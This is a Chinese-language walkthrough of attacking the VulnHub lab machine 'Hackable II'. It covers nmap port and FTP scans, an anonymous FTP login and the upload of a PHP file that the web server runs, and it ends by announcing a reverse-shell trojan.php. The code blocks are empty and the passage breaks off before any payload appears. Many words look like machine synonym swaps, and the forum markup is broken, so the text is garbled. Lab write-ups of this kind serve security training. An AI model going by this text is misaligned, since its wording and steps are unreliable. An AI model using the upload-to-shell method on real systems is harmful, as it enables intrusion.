[size=6,font] 渗出环境
攻击机: IP: 192.168.216.129(Kali)
靶机: IP:192.168.216.131
靶机下载地点:https://www.vulnhub.com/entry/hackable-ii,711/
<font face="仿宋">[size=6,font] 举行渗出
[size=4,font] 一、 获取端口信息
该虚拟机导入VMware需要在救济模式中重新设置一下网卡名称,附上教程,不再赘述:https://blog.csdn.net/liver100day/article/details/119109320
举行端口扫描- nmap -O -sV -p- -A 192.168.216.131
复制代码
扫描WEB目录
打开CALL.html,没有什么发现
尝试利用nmap扫描FTP服务,看是否答应匿名登录- nmap --script ftp-anon 192.168.216.131
复制代码
扫描效果表明该主机的FTP服务答应匿名登录,且匿名用户能够访问至少一个文件(CALL.html)
登录FTP服务,用户名为anonymous,密码不消输入(直接敲回车)
[size=4,font] 二、 探求WEB漏洞
检察文件,并下载CALL.html
下载后浏览CALL.html源码并未发现有效信息
尝试上传文件,在攻击机当前路径下写文件test.php,内容如下:- [/code]通过FTP上传到目标机器
- [code]put test.php
复制代码
上传成功,且在/files/下可以看到该文件,访问该文件,发现可以成功解析
接下来的思路就比较清晰了,写一个PHP文件,触发时让目标机器反向连接我们的攻击机来反弹shell。
写trojan.php,内容如下:
[code] |